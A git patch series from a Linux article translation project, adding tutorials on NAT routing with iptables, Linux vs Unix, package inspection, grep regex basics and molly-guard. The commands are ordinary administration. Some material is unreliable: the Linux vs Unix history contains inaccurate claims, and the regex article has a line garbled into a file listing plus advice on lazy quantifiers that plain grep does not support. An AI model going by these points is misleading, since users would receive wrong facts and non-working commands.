+ +第一步,我们启用 IP 转发。 这一步在 RHEL/CentOS 6 和 7 上是相同的。 运行 + +``` +$ sysctl -w net.ipv4.ip_forward=1 +``` + +但是这样会在系统重启后恢复。要让重启后依然生效需要打开 + +``` +$ vi /etc/sysctl.conf +``` + +然后输入下面内容, + +``` +net.ipv4.ip_forward = 1 +``` + +保存并退出。现在系统就启用 IP 转发了。 + +### 步骤 2 配置 IPtables/Firewalld 的规则 + +下一步我们需要启动 IPtables/firewalld 服务并配置 NAT 规则, + +``` +$ systemctl start firewalld (For Centos/RHEL 7) +$ service iptables start (For Centos/RHEL 6) +``` + +然后运行下面命令来配置防火墙的 NAT 规则: + +``` +CentOS/RHEL 6 +$ iptables -t nat -A POSTROUTING -o XXXX -j MASQUERADE +$ service iptables restart +CentOS/RHEL 7 +$ firewall-cmd -permanent -direct -passthrough ipv4 -t nat -I POSTROUTING -o XXXX -j MASQUERADE -s 192.168.1.0/24 +$ systemctl restart firewalld +``` +这里,**XXXX** 是配置有外网 IP 的那个网卡名称。 这就将 Linux 及其配置成了路由器了, 下面我们就可以配置客户端然后测试路由器了。 + +### 步骤 3 配置客户端 + +要测试路由器,我们需要在客户端的网关设置成内网 IP, 本例中就是 192.168.1.1。 因此不管客户机是 Windows 还是 Linux, 请先确保网关是 192.168.1.1。 完成后, 打开终端 /CMD 并 ping 一个网站来测试客户端是否能访问互联网了: + +``` +$ ping google.com +``` + +我们也可以通过网络浏览器访问网站的方式来检查。 + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/turning-centosrhel-6-7-machine-router/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:https://www.facebook.com/linuxtechlab/ +[2]:https://twitter.com/LinuxTechLab +[3]:https://plus.google.com/+linuxtechlab From e5a199ead452bbee058f03c0b1dfe95ac8f48495 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 19:24:37 +0800 Subject: [PATCH 0625/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Vs=20Un?= =?UTF-8?q?ix?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171215 Linux Vs Unix.md | 141 +++++++++++++++++++++++++ 1 file changed, 141 insertions(+) create mode 100644 sources/tech/20171215 Linux Vs Unix.md diff --git a/sources/tech/20171215 Linux Vs Unix.md b/sources/tech/20171215 Linux Vs Unix.md new file mode 100644 index 0000000000..9b5cd0b104 --- /dev/null +++ b/sources/tech/20171215 Linux Vs Unix.md @@ -0,0 +1,141 @@ + + [![Linux vs. Unix](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix-vs-linux_orig.jpg)][1] + +​In computer time, a substantial part of the population has a misconception that the **Unix** and **Linux** operating systems are one and the same. However, the opposite is true. Let's look at it from a closer look. + +### What is Unix? + + [![what is unix](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix_orig.png)][2] + +In IT, we come across + +[Unix][3] + +as an operating system (under the trademark), which was created by AT & T in 1969 in New Jersey, USA. Most operating systems are inspired by Unix, but Unix has also been inspired by the Multics system, which has not been completed. Another version of Unix was Plan 9 from Bell Labs. + +### Where is Unix used? + +As an operating system, Unix is used in particular for servers, workstations, and nowadays also for personal computers. It played a very important role in the creation of the Internet, the creation of computer networks or also the client-server model. + +#### Characteristics of the Unix system: + +* supports multitasking (multitasking) + +* Simplicity of control compared to Multics + +* all data is stored as plain text + +* tree saving of a single-root file + +* access to multiple user accounts​ + +#### Unix Operating System Composition: + +​ + +**a)** + +a monolithic operating system kernel that takes care of low-level and user-initiated operations, the total communication takes place via a system call. + +**b)** + +system utilities (or so-called utilities) + +**c)** + +many other applications + +### What is Linux? + + [![what is linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux_orig.png)][4] + +This is an open source operating system built on the principle of a Unix system. As the name of the open-source description suggests, it is a freely-downloadable system that can be downloaded externally, but it is also possible to interfere with the system's editing, adding, and then extending the source code. It's one of the biggest benefits, unlike today's operating systems that are paid (Windows, Mac OS X, ...). Not only was Unix a model for creating a new operating system, another important factor was the MINIX system. Unlike + +**Linus** + +, this version was used by its creator ( + +**Andrew Tanenbaum** + +) as a commercial system. + +​ + +[Linux][5] + +began to be developed by + +**Linus Torvalds** + +in 1991, which was a system that dealt with as a hobby. One of the main reasons why Linux started to deal with Unix was the simplicity of the system. The first official release of the provisory version of Linux (0.01) occurred on September 17, 1991\. Even though the system was completely imperfect and complete, it was of great interest to him, and within a few days, Linus started to write emails with other ideas about expansion or source codes. + +### Characteristics of Linux + +The cornerstone of Linux is the Unix kernel, which is based on the basic characteristics of Unix and the standards that are + +**POSIX** + + and Single + +**UNIX Specification** + +. As it may seem, the official name of the operating system is taken from the creator of + +**Linus** + +, where the end of the operating system name "x" is just a link to the + +**Unix system** + +. + +#### Main features: + +* run multiple tasks at once (multitasking) + +* programs may consist of one or more processes (multipurpose system), and each process may have one or more threads + +* multiuser, so it can run multiple user programs + +* individual accounts are protected by appropriate authorization + +* so the accounts have precisely defined system control rights + +The author of + +**Tuxe Penguin's** + +logo is Larry Ewing of 1996, who accepted him as a mascot for his open-source + +**Linux operating system** + +. + +**Linux Torvalds** + +proposed the initial name of the new operating system as "Freax" as free + freak + x ( + +**Unix system** + +), but it did not like the + +**FTP server** + +where the provisory version of Linux was running. + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/linux-vs-unix + +作者:[linuxandubuntu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:http://www.linuxandubuntu.com/home/linux-vs-unix +[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix_orig.png +[3]:http://www.unix.org/what_is_unix.html +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux_orig.png +[5]:https://www.linux.com From 0230777c804bc2d191fe3f3d164aa4c19e055e54 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 19:40:29 +0800 Subject: [PATCH 0626/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Peeking=20into?= =?UTF-8?q?=20your=20Linux=20packages?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...171214 Peeking into your Linux packages.md | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 sources/tech/20171214 Peeking into your Linux packages.md diff --git a/sources/tech/20171214 Peeking into your Linux packages.md b/sources/tech/20171214 Peeking into your Linux packages.md new file mode 100644 index 0000000000..055148f598 --- /dev/null +++ b/sources/tech/20171214 Peeking into your Linux packages.md @@ -0,0 +1,125 @@ +Peeking into your Linux packages +====== +Do you ever wonder how many _thousands_ of packages are installed on your Linux system? And, yes, I said "thousands." Even a fairly modest Linux system is likely to have well over a thousand packages installed. And there are many ways to get details on what they are. + +First, to get a quick count of your installed packages on a Debian-based distribution such as Ubuntu, use the command **apt list --installed** like this: +``` +$ apt list --installed | wc -l +2067 + +``` + +This number is actually one too high because the output contains "Listing..." as its first line. This command would be more accurate: +``` +$ apt list --installed | grep -v "^Listing" | wc -l +2066 + +``` + +To get some details on what all these packages are, browse the list like this: +``` +$ apt list --installed | more +Listing... +a11y-profile-manager-indicator/xenial,now 0.1.10-0ubuntu3 amd64 [installed] +account-plugin-aim/xenial,now 3.12.11-0ubuntu3 amd64 [installed] +account-plugin-facebook/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed] +account-plugin-flickr/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed] +account-plugin-google/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed] +account-plugin-jabber/xenial,now 3.12.11-0ubuntu3 amd64 [installed] +account-plugin-salut/xenial,now 3.12.11-0ubuntu3 amd64 [installed] + +``` + +That's a lot of detail to absorb -- especially if you let your eyes wander through all 2,000+ files rolling by. It contains the package names, versions, and more but isn't the easiest information display for us humans to parse. The dpkg-query makes the descriptions quite a bit easier to understand, but they will wrap around your command window unless it's _very_ wide. So, the data display below has been split into the left and right hand sides to make this post easier to read. + +Left side: +``` +$ dpkg-query -l | more +Desired=Unknown/Install/Remove/Purge/Hold +| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend +|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) +||/ Name Version ++++-==============================================-=================================- +ii a11y-profile-manager-indicator 0.1.10-0ubuntu3 +ii account-plugin-aim 3.12.11-0ubuntu3 +ii account-plugin-facebook 0.12+16.04.20160126-0ubuntu1 +ii account-plugin-flickr 0.12+16.04.20160126-0ubuntu1 +ii account-plugin-google 0.12+16.04.20160126-0ubuntu1 +ii account-plugin-jabber 3.12.11-0ubuntu3 +ii account-plugin-salut 3.12.11-0ubuntu3 +ii account-plugin-twitter 0.12+16.04.20160126-0ubuntu1 +rc account-plugin-windows-live 0.11+14.04.20140409.1-0ubuntu2 + +``` + +Right side: +``` +Architecture Description +============-===================================================================== +amd64 Accessibility Profile Manager - Unity desktop indicator +amd64 Messaging account plugin for AIM +all GNOME Control Center account plugin for single signon - facebook +all GNOME Control Center account plugin for single signon - flickr +all GNOME Control Center account plugin for single signon +amd64 Messaging account plugin for Jabber/XMPP +amd64 Messaging account plugin for Local XMPP (Salut) +all GNOME Control Center account plugin for single signon - twitter +all GNOME Control Center account plugin for single signon - windows live + +``` + +The "ii" and "rc" designations at the beginning of each line (see "Left side" above) are package state indicators. The first letter represents the desirable package state: +``` +u -- unknown +i -- install +r -- remove/deinstall +p -- purge (remove including config files) +h -- hold + +``` + +The second represents the current package state: +``` +n -- not-installed +i -- installed +c -- config-files (only the config files are installed) +U -- unpacked +F -- half-configured (the configuration failed for some reason) +h -- half-installed (installation failed for some reason) +W -- triggers-awaited (the package is waiting for a trigger from another package) +t -- triggers-pending (the package has been triggered) + +``` + +An added "R" at the end of the normally two-character field would indicate that reinstallation is required. You may never run into these. + +One easy way to take a quick look at your overall package status is to count how many packages are in which of the different states: +``` +$ dpkg-query -l | tail -n +6 | awk '{print $1}' | sort | uniq -c + 2066 ii + 134 rc + +``` + +I excluded the top five lines from the dpkg-query output above because these are the header lines that would have confused the output. + +The two lines basically tell us that on this system, 2,066 packages should be and are installed, while 134 other packages have been removed but have left configuration files behind. You can always remove a package's remaining configuration files with a command like this: +``` +$ sudo dpkg --purge xfont-mathml + +``` + +Note that the command above would have removed the package binaries along with the configuration files if both were still installed. + + +-------------------------------------------------------------------------------- + +via: https://www.networkworld.com/article/3242808/linux/peeking-into-your-linux-packages.html + +作者:[Sandra Henry-Stocker][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/ From 6a5fdf1e5276502ba84e19a266da48592de9863a Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Sat, 16 Dec 2017 20:07:39 +0800 Subject: [PATCH 0627/1627] Update 20171211 How to Install Arch Linux [Step by Step Guide].md --- .../20171211 How to Install Arch Linux [Step by Step Guide].md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md b/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md index f0e5df3785..79d165febc 100644 --- a/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md +++ b/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md @@ -1,3 +1,4 @@ +translating by wenwensnow How to Install Arch Linux [Step by Step Guide] ====== **Brief: This tutorial shows you how to install Arch Linux in easy to follow steps.** From 2799f77c6974b2cfeb2ab4c8470f7f49c44ab3fa Mon Sep 17 00:00:00 2001 From: cmn <2545489745@qq.com> Date: Sat, 16 Dec 2017 21:12:38 +0800 Subject: [PATCH 0628/1627] translated --- ... Scripting- Learn to use REGEX (Basics).md | 151 ++++++++++++++++++ 1 file changed, 151 insertions(+) create mode 100644 translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md diff --git a/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md b/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md new file mode 100644 index 0000000000..83e9514054 --- /dev/null +++ b/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md @@ -0,0 +1,151 @@ +Bash 脚本:学习使用正则表达式(基础) +====== +正则表达式(简写为 regex 或者 regexp)基本上是定义一种搜索模式的字符串,可以被用来执行“搜索”或者“搜索并替换”操作,也可以被用来验证像密码策略等条件。 + +正则表达式是一个我们可利用的非常强大的工具,并且使用正则表达式最好的事情是它能在几乎所有计算机语言中被使用。所以如果你使用 Bash 脚本或者创建一个 python 程序时,我们可以使用正则表达式或者也可以写一个单行搜索查询。 + +在这篇教程中,我们将会学习一些正则表达式的基本概念,并且学习如何在 Bash 中使用‘grep’时使用它们,但是如果你希望在其他语言如 python 或者 C 中使用它们,你只能使用正则表达式部分。那么让我们通过正则表达式的一个例子开始吧, + + **Ex-** 一个正则表达式看起来像 + + **/t[aeiou]l/** + +但这是什么意思呢?它意味着所提到的正则表达式将寻找一个词,它以‘t’开始,在中间包含字母‘a e i o u’中任意一个,并且字母‘l’最为最后一个字符。它可以是‘tel’,‘tal’或者‘til’,匹配可以是一个单独的词或者其它单词像‘tilt’,‘brutal’或者‘telephone’的一部分。 + + **grep 使用正则表达式的语法是** + + **$ grep "regex_search_term" file_location** + +如果头脑中没有想法,不要担心,这只是一个例子,来展示可以利用正则表达式获取什么,并且相信我这是最简单的例子。我们可以从正则表达式中获取更多。现在我们将从正则表达式基础的开始。 + + **(推荐阅读: [你应该知道的有用的 linux 命令][1])** + +## **基础的正则表示式** + +现在我们开始学习一些被称为元字符(MetaCharacters)的特殊字符。他们帮助我们创建更复杂的正则表达式搜索项。下面提到的是基本元字符的列表, + + **. or Dot** 将匹配任意字符 + + **[ ]** 将匹配范围内字符 + + **[^ ]** 将匹配除了括号中提到的那个之外的所有字符 + + ***** 将匹配零个或多个前面的项 + + **+** 将匹配一个或多个前面的项 + + **? ** 将匹配零个或一个前面的项 + + **{n}** 将匹配‘n’次前面的项 + + **{n,}** 将匹配‘n’次或更多前面的项 + + **{n m} ** 将匹配在‘n’和‘m’次之间的项 + + **{ ,m}** 将匹配少于或等于‘m’次的项 + + **\ ** 是一个转义字符,当我们需要在我们的搜索中包含一个元字符时使用 + +现在我们将用例子讨论所有这些元字符。 + +### **. or Dot** + +它用于匹配出现在我们搜索项中的任意字符。举个例子,我们可以使用点如 + + **$ grep "d.g" file1** + +这个正则表达式意味着我们在‘file_name’文件中正查找的词以‘d’开始,以‘g’结尾,中间可以有任意字符。同样,我们可以使用任意数量的点作为我们的搜索模式,如 + + **T ……h** + +这个查询项将查找一个词,以‘T’开始,以‘h’结尾,并且中间可以有任意 6 个字符。 + +### **[ ]** + +方括号用于定义字符的范围。 例如,我们需要搜索一些特别的单词而不是匹配任何字符, + + **$ grep "N[oen]n" file2** + +这里,我们正寻找一个单词,以‘N’开头,以‘n’结尾,并且中间只能有‘o’,‘e’或者‘n’中的一个。 在方括号中我们可以提到单个到任意数量的字符。 + +我们在方括号中也可以定义像‘a-e’或者‘1-18’作为匹配字符的列表。 + +### **[^ ]** + +这就像正则表达式的 not 操作。当使用 [^ ] 时,它意味着我们的搜索将包括除了方括号内提到的所有字符。例如, + + **$ grep "St[^1-9]d" file3** + +这意味着我们可以拥有所有这样的单词,它们以‘St’开始,以字母‘d’结尾,并且不得包含从1到9的任何数字。 + +到现在为止,我们只使用了仅需要在中间查找单个字符的正则表达式的例子,但是如果我们需要看的更多该怎么办呢。假设我们需要找到以一个字符开头和结尾的所有单词,并且在中间可以有任意数量的字符。这就是我们使用乘数(multiplier)元字符如 + * & ? 的地方。 + +{n},{n. m},{n , } 或者 { ,m} 也是可以在我们的正则表达式项中使用的其他乘数元字符。 + +### * (星号) + +以下示例匹配字母k的任意出现次数,包括一次没有: + + **$ grep "lak*" file4** + +它意味着我们可以匹配到‘lake’,‘la’或者‘lakkkk’ + +### + + +以下模式要求字符串中的字母k至少被匹配到一次: + + **$ grep "lak+" file5** + +这里k 在我们的搜索中至少需要发生一次,所以我们的结果可以为‘lake’或者‘lakkkk’,但不能是‘la’。 + +### **?** + +在以下模式匹配中 + + **$ grep "ba?b" file6** + +字符串 bb 或 bab,使用‘?’乘数,我们可以有一个或零个字符的出现。 + +### **非常重要的提示:** + +当使用乘数时这是非常重要的,假设我们有一个正则表达式 + + **$ grep "S.*l" file7** + +我们得到的结果是‘small’,‘silly’,并且我们也得到了‘Shane is a little to play ball’。但是为什么我们得到了‘Shane is a little to play ball’,我们只是在搜索中寻找单词,为什么我们得到了整个句子作为我们的输出。 + +这是因为它满足我们的搜索标准,它以字母‘s’开头,中间有任意数量的字符并以字母‘l’结尾。那么,我们可以做些什么来纠正我们的正则表达式来只是得到单词而不是整个句子作为我们的输出。 + +我们在正则表达式中需要增加 ? 元字符, + + **$ grep "S.*?l" file7** + +这将会纠正我们正则表达式的行为。 + +### **\ or Escape characters** + +\ 是当我们需要包含一个元字符或者对正则表达式有特殊含义的字符的时候来使用。例如,我们需要找到所有以点结尾的单词,所以我们可以使用 + + **$ grep "S.*\\." file8** + +这将会查找和匹配所有以一个点字符结尾的词。 + +通过这篇基本正则表达式教程,我们现在有一些关于正则表达式如何工作的基本概念。在我们的下一篇教程中,我们将学习一些高级的正则表达式的概念。同时尽可能多地练习,创建正则表达式并试着尽可能多地在你的工作中加入它们。如果有任何疑问或问题,您可以在下面的评论区留言。 + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/ + +作者:[SHUSAIN][a] +译者:[kimii](https://github.com/kimii) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/useful-linux-commands-you-should-know/ + + + + + From 49ee80ff5e351c674b79f00e4038e90c3e2752bc Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Sat, 16 Dec 2017 21:14:30 +0800 Subject: [PATCH 0629/1627] Delete 20171214 Bash Scripting- Learn to use REGEX (Basics).md --- ... Scripting- Learn to use REGEX (Basics).md | 148 ------------------ 1 file changed, 148 deletions(-) delete mode 100644 sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md diff --git a/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md b/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md deleted file mode 100644 index f6a32b0153..0000000000 --- a/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md +++ /dev/null @@ -1,148 +0,0 @@ -translating by kimii -Bash Scripting: Learn to use REGEX (Basics) -====== -Regular expressions or regex or regexp are basically strings of character that define a search pattern, they can be used for performing 'Search' or 'Search & Replace' operations as well as can be used to validate a condition like password policy etc. - -Regex is a very powerful tool that is available at our disposal & best thing about using regex is that they can be used in almost every computer language. So if you are Bash Scripting or creating a Python program, we can use regex or we can also write a single line search query. - -For this tutorial, we are going to learn some of regex basics concepts & how we can use them in Bash using 'grep', but if you wish to use them on other languages like python or C, you can just use the regex part. So let's start by showing an example for regex, - - **Ex-** A regex looks like - - **/t[aeiou]l/** - -But what does this mean. It means that the mentioned regex is going to look for a word that starts with 't' , have any of the letters 'a e I o u ' in the middle & letter 'l' as the last word . It can be 'tel' 'tal' or 'til' / Match can be a separate word or part of another word like 'tilt', 'brutal' or 'telephone'. - - **Syntax for using regex with grep is** - - **$ grep "regex_search_term" file_location** - -Don't worry if its getting over the mind, this was just an example to show what can be achieved with regex & believe me this was simplest of the example. We can achieve much much more from regex. We will now start regex with basics. - - **(Recommended Read: [Useful Linux Commands that you should know ][1])** - -## **Regex Basics** - -We will now start learning about some special characters that are known as MetaCharacters. They help us in creating more complex regex search term. Mentioned below is the list of basic metacharacters, - - **. or Dot** will match any character - - **[ ]** will match a range of characters - - **[^ ]** will match all character except for the one mentioned in braces - - ***** will match zero or more of the preceding items - - **+** will match one or more of the preceding items - - **? ** will match zero or one of the preceding items - - **{n}** will match 'n' numbers of preceding items - - **{n,}** will match 'n' number of or more of preceding items - - **{n m} ** will match between 'n' & 'm' number of items - - **{ ,m}** will match less than or equal to m number of items - - **\ ** is an escape character, used when we need to include one of the metcharacters is our search. - -We will now discuss all these metacharatcters with examples. - -### **. or Dot** - -Its used to match any character that occurs in our search term. For example, we can use dot like - - **$ grep "d.g" file1** - -This regex means we are looking for a word that starts with 'd', ends with 'g' & can have any character in the middle in the file named 'file_name'. Similarly we can use dot character any number of times for our search pattern, like - - **T ……h** - -This search term will look for a word that starts with 'T', ends with 'h' & can have any six characters in the middle. - -### **[ ]** - -Square braces are used to define a range of characters. For example, we need to search for some words in particular rather than matching any character, - - **$ grep "N[oen]n" file2** - -here, we are looking for a word that starts with 'N', ends with 'n' & can only have either of 'o' or 'e' or 'n' in the middle . We can mention from a single to any number of characters inside the square braces. - -We can also define ranges like 'a-e' or '1-18' as the list of matching characters inside square braces. - -### **[^ ]** - -This is like the not operator for regex. While using [^ ], it means that our search will include all the characters except the ones mentioned inside the square braces. Example, - - **$ grep "St[^1-9]d" file3** - -This means that we can have all the words that starts with 'St' , ends with letter 'd' & must not contain any number from 1 to 9. - -Now up until now we were only using examples of regex that only need to look for single character in middle but what if we need to look to more than that. Let's say we need to locate all words that starts & ends with a character & can have any number of characters in the middle. That's where we use multiplier metacharacters i.e. + 20171202 docker - Use multi-stage builds.md comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE published README.md sign.md sources translated 选题模板.txt 中文排版指北.md & ?. - -{n}, {n. m}, {n , } or { ,m} are also some other multipliers metacharacters that we can use in our regex terms. - -### * (asterisk) - -The following example matches any number of occurrences of the letter k, including none: - - **$ grep "lak*" file4** - -it means we can have a match with 'lake' or 'la' or 'lakkkkk' - -### + - -The following pattern requires that at least one occurrence of the letter k in the string be matched: - - **$ grep "lak+" file5** - -here, k at least should occur once in our search, so our results can be 'lake' or 'lakkkkk' but not 'la'. - - -### **?** - -In the following pattern matches - - **$ grep "ba?b" file6** - -the string bb or bab as with '?' multiplier we can have one or zero occurrence of the character. - -### **Very important Note:** - -This is pretty important while using multipliers, suppose we have a regex - - **$ grep "S.*l" file7** - -And we get results with 'small' , silly & than we also got 'Shane is a little to play ball'. But why did we get 'Shane is a little to play ball', we were only looking to words in our search so why did we get the complete sentence as our output. - -That's because it satisfies our search criteria, it starts with letter 'S', has any number of characters in the middle & ends with letter 'l'. So what can we do to correct our regex, so that we only get words instead of whole sentences as our output. - -We need to add ? Meta character in the regex, - - **$ grep "S.*?l" file7** - -This will correct the behavior of our regex. - -### **\ or Escape characters** - -\ is used when we need to include a character that is a metacharacter or has special meaning to regex. For example, we need to locate all the words ending with dot, so we can use - - **$ grep "S.*\\." file8** - -This will search and match all the words that ends with a dot character. - -We now have some basic idea of how the regex works with this regex basics tutorial. In our next tutorial, we will learn some advance concepts of regex. In meanwhile practice as much as you can, create regex and try to en-corporate them in your work as much as you can. & if having any queries or questions you can leave them in the comments below. - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/ - -作者:[SHUSAIN][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1]:http://linuxtechlab.com/useful-linux-commands-you-should-know/ From d4ec285c5824209003a09d85c051311f7f20388d Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 21:19:24 +0800 Subject: [PATCH 0630/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20prot?= =?UTF-8?q?ects=20Linux=20and=20Unix=20machines=20from=20accidental=20shut?= =?UTF-8?q?downs/reboots=20with=20molly-guard?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ntal shutdowns-reboots with molly-guard.md | 115 ++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md diff --git a/sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md b/sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md new file mode 100644 index 0000000000..13f4fcb9d5 --- /dev/null +++ b/sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md @@ -0,0 +1,115 @@ +Translating by lujun9972 +How to protects Linux and Unix machines from accidental shutdowns/reboots with molly-guard +====== +Oops! I did it again. I thought I was logged into my home server. Turns out [I rebooted the db server][1]. Another my not so favorite is typing "[shutdown -h 0][2]" into the wrong terminal. I know a few people who have [admitted to doing that here][3]. +![My anger that can't be contained][4] +Is there any end to the madness? Do I need to suffer from accidentally random reboots and shutdowns? After all, it is human nature to make mistakes, but one should not keep on making the same mistakes again and again. + +Recently I tweeted my frustration: + +> I seems to run into this stuff again and again :( Instead of typing: +> sudo virsh reboot d1 +> +> I just typed & rebooted my own box +> sudo reboot d1 +> +> -- nixCraft (@nixcraft) [February 19, 2017][5] + + +I come across quite a few suggestion on Twitter. Let us try out those. + +### Say hello to molly guard + +Molly-Guard **try to block you from accidentally running or shutting down or rebooting Linux servers**. From the Debian/Ubuntu package description: + +> The package installs a shell script that overrides the existing shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* commands and first runs a set of scripts, which all have to exit successfully, before molly-guard invokes the real command. One of the scripts checks for existing SSH sessions. If any of the four commands are called interactively over an SSH session, the shell script prompts you to enter the name of the host you wish to shut down. This should adequately prevent you from accidental shutdowns and reboots. + +It seems [molly-guard][6] has the entry in the Jargon File: + +> A shield to prevent tripping of some Big Red Switch by clumsy or ignorant hands. Originally used of the plexiglass covers improvised for the BRS on an IBM 4341 after a programmer's toddler daughter (named Molly) frobbed it twice in one day. Later generalized to covers over stop/reset switches on disk drives and networking equipment. In hardware catalogues, you'll see the much less interesting description "guarded button". + +### How to install molly guard + +Type the following command to search and install molly-guard using [apt-get command][7] or [apt command][8]: +``` +$ apt search molly-guard +$ sudo apt-get install molly-guard +``` +Sample outputs: +[![Fig.01: Installing molly guard on Linux][9]][10] + +### Test it + +Type the [reboot command][11] or shutdown command: +``` +$ sudo reboot +# reboot +$ shutdown -h 0 +# sudo shutdown -h 0 +### running wrong command such as follows instead of +### sudo virsh reboot vm_name_here +$ sudo reboot vm_name_here +``` +Sample outputs: +![Fig.02: Molly guard saved my butt ;\)][12] +I liked molly-guard so much. I updated my apt-debian-ubuntu-common.yml file with the following lines: +``` + - apt: + name: molly-guard + +``` + +That's right. It is now part of all of my Debian and Ubuntu servers automation tasks done using Ansible tool. + + **Related** : [My 10 UNIX Command Line Mistakes][13] + +### What if molly-guard not available on my Linux distro or Unix system like FreeBSD? + +Fear not, [set shell aliases][14]: +``` +## bash shell example ### +alias reboot = "echo 'Are you sure?' If so, run /sbin/reboot" +alias shutdown = "echo 'Are you sure?' If so, run /sbin/shutdown" +``` + +You can [temporarily get rid of an aliases and run actual command][15] such as reboot: +``` +# \reboot +``` +OR +``` +# /sbin/reboot +``` +Another option is to write a [shell/perl/python script calling these and asking][16] confirmation for reboot/halt/shutdown options. + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/faq/howto-reboot-linux/ +[2]:https://www.cyberciti.biz/faq/shutdown-linux-server/ +[3]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html (My 10 UNIX Command Line Mistakes) +[4]:https://www.cyberciti.biz/media/new/cms/2017/02/anger.gif +[5]:https://twitter.com/nixcraft/status/833320792880320513 +[6]:http://catb.org/~esr/jargon/html/M/molly-guard.html +[7]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info) +[8]://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info) +[9]:https://www.cyberciti.biz/media/new/cms/2017/02/install-molly-guard-on-linux.jpg +[10]:https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/attachment/install-molly-guard-on-linux/ +[11]:https://www.cyberciti.biz/faq/linux-reboot-command/ (See Linux/Unix reboot command examples for more info) +[12]:https://www.cyberciti.biz/media/new/cms/2017/02/saved-my-butt.jpg +[13]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html 